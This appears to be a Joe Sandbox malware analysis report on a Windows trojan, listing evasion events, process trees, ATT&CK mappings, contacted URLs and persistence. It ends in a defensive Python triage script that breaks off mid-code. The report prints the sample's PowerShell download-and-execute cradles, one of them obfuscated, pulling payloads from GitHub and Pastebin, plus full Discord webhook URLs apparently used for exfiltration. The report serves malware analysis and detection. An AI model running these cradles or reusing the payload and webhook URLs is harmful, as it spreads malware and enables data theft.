Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 588078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 590781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 590844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1834
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3075
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1721
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 435
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3160
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1146
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 856
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5483
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1333
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -588078s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep count: 435 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep count: 39 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288 Thread sleep count: 3160 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788 Thread sleep count: 1146 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2808 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep time: -590781s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156 Thread sleep count: 856 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220 Thread sleep count: 240 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068 Thread sleep count: 191 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 336 Thread sleep count: 5483 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep count: 1333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 32 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 92 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep time: -590844s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\OSLdZanXNc.exe Code function: 0_2_00007FF68EF32370 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF68EF32370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\OSLdZanXNc.exe Code function: 0_2_00007FF68EF31E94 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF68EF31E94
Source: C:\Users\user\Desktop\OSLdZanXNc.exe Code function: 0_2_00007FF68EF32514 SetUnhandledExceptionFilter, 0_2_00007FF68EF32514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Queries volume information (48 events from the powershell.exe processes, collapsed by path):
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (23 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (6 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (6 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (6 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation (1 event)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation (3 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation (3 events)
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF32250 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF68EF32250
MITRE ATT&CK Matrix (flattened by tactic; a leading number is the badge the report shows on a matched technique, techniques without one were not matched)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 111 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 121 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1534108 | Sample: OSLdZanXNc.exe | Start date: 15/10/2024 | Architecture: WINDOWS | Score: 88
Contacted hosts: pastebin.com, raw.githubusercontent.com, discord.com
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: PowerShell Download and Execution Cradles; 2 other signatures; Connects to a pastebin service (likely for C&C) (pastebin.com)
Process tree (node numbers are the graph's process IDs):
  OSLdZanXNc.exe (9)
    powershell.exe (16): Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Powershell creates an autostart link
      powershell.exe (29): raw.githubusercontent.com 185.199.108.133 remote port 443, local ports 49757, 49763 (FASTLYUS, Netherlands); discord.com 162.159.137.232 remote port 443, local ports 49868, 49943 (CLOUDFLARENETUS, United States); dropped C:\ProgramData\...\BeginSync.lnk (MS); Tries to open files direct via NTFS file id
        conhost.exe (38)
        attrib.exe (40)
    conhost.exe (19)
  forfiles.exe (11): Suspicious powershell command line found
    powershell.exe (21)
      powershell.exe (34): pastebin.com 104.20.3.235 remote port 443, local ports 49854, 49856 (CLOUDFLARENETUS, United States)
    conhost.exe (23)
  forfiles.exe (14)
    powershell.exe (25)
      powershell.exe (36)
    conhost.exe (27)

Antivirus detection
Source | Detection | Scanner | Label
OSLdZanXNc.exe | 0% | ReversingLabs |
No Antivirus matches (repeated for the remaining three antivirus sections)
URL reputation
Source | Detection | Scanner | Label
https://go.micro | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.137.232 | true | true | | unknown
raw.githubusercontent.com | 185.199.108.133 | true | true | | unknown
pastebin.com | 104.20.3.235 | true | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI | true | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt | false | | unknown
http://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt | false | | unknown
URLs from memory and binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://discord.com | powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://discord.com/api/webhooks/128545359042878 | powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.3233396001.000001E8386F2000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://raw.githubusercontent.com | powershell.exe, 0000000B.00000002.3233396001.000001E8386FA000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://go.micro | powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 0000000B.00000002.3233396001.000001E838753000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.3233396001.000001E838784000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://discord.com | powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.3233396001.000001E837CBC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pastebin.com | powershell.exe, 0000000B.00000002.3233396001.000001E8386D4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.3233396001.000001E8386B9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pastebin.com | powershell.exe, 0000000B.00000002.3233396001.000001E8386C4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534108
Start date and time: 2024-10-15 16:00:00 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OSLdZanXNc.exe (renamed because the original name is a hash value)
Original Sample Name: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
Detection: MAL
Classification: mal88.troj.evad.winEXE@21/16@3/3
EGA Information:
  • Successful, ratio: 50%
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 15
  • Number of non-executed functions: 17
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 7328 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information
  • VT rate limit hit for: OSLdZanXNc.exe
Time | Type | Description
15:01:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
15:01:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
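The two autostart entries above, the attrib.exe +s +h command and the dropped BeginSync.lnk listed earlier are the sample's persistence: a Run value named after OneDrive that launches a hidden shortcut from a fake OneDrive directory under C:\ProgramData. The Python below is an added triage example written for this report, not Joe Sandbox or sample code, that scores a Run value on exactly those traits: the target is a .lnk, it sits under C:\ProgramData, the path borrows the OneDrive name outside OneDrive's real install locations, and a script host made the target hidden and system with attrib. The registry and process events are constructed from the report's entries; the benign OneDrive control value, the legitimate-path patterns, the script-host list and all function names are assumptions of this example.

```python
"""Triage a Run-key autostart value against the persistence traits seen in
this report. Added example, not Joe Sandbox or sample code. SAMPLE_* events
are constructed from the report's Autostart, process-creation and dropped-file
entries; BENIGN_RUN_VALUE is a made-up control."""
import re
from dataclasses import dataclass

RUN_KEY_RE = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\")
# Where a real OneDrive client lives: per-machine under Program Files, or
# per-user under %LocalAppData%. Anything else using the name is masquerading.
LEGIT_ONEDRIVE_RE = re.compile(
    r"^(?:c:\\program files\\microsoft onedrive\\"
    r"|c:\\users\\[^\\]+\\appdata\\local\\microsoft\\onedrive\\)")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}


@dataclass
class RegistryEvent:
    key: str      # full path of the value, e.g. HKCU\...\Run\OneDrive File Sync
    data: str     # value data, i.e. the command run at logon


@dataclass
class ProcessEvent:
    parent: str   # parent image path
    image: str    # image path
    cmdline: str


def _base(path):
    """Lower-cased file name of an image path."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def target_path(data):
    """The launched file from Run value data: first quoted string or first token."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', data)
    return (m.group(1) or m.group(2)).lower() if m else data.lower()


def attrib_hides(proc, target):
    """True if proc is attrib.exe applying +h or +s to `target` (lower-cased path)."""
    if _base(proc.image) != "attrib.exe":
        return False
    flags = {f.lower() for f in re.findall(r"(?<!\S)[+-][shra](?!\S)", proc.cmdline)}
    quoted = re.findall(r'"([^"]+)"', proc.cmdline)
    path = quoted[-1] if quoted else proc.cmdline.split()[-1]
    return path.lower() == target and bool(flags & {"+h", "+s"})


def triage_run_value(reg, processes):
    """Suspicious traits found for one Run value (empty list means nothing odd)."""
    findings = []
    if not RUN_KEY_RE.search(reg.key):
        return findings
    target = target_path(reg.data)
    if target.endswith(".lnk"):
        findings.append("Run value launches a .lnk shortcut rather than an executable")
    if target.startswith("c:\\programdata\\"):
        findings.append("target is under C:\\ProgramData, which standard users can write to")
    if "onedrive" in target and not LEGIT_ONEDRIVE_RE.match(target):
        findings.append("OneDrive name used outside OneDrive's real install paths")
    for p in processes:
        if attrib_hides(p, target) and _base(p.parent) in SCRIPT_HOSTS:
            findings.append(f"target made hidden/system by attrib.exe spawned from {_base(p.parent)}")
    return findings


def severity(findings):
    return "high" if len(findings) >= 3 else "medium" if findings else "none"


# Constructed from the report's entries.
SAMPLE_RUN_VALUE = RegistryEvent(
    key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync",
    data=r'"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"')
SAMPLE_PROCESSES = [ProcessEvent(
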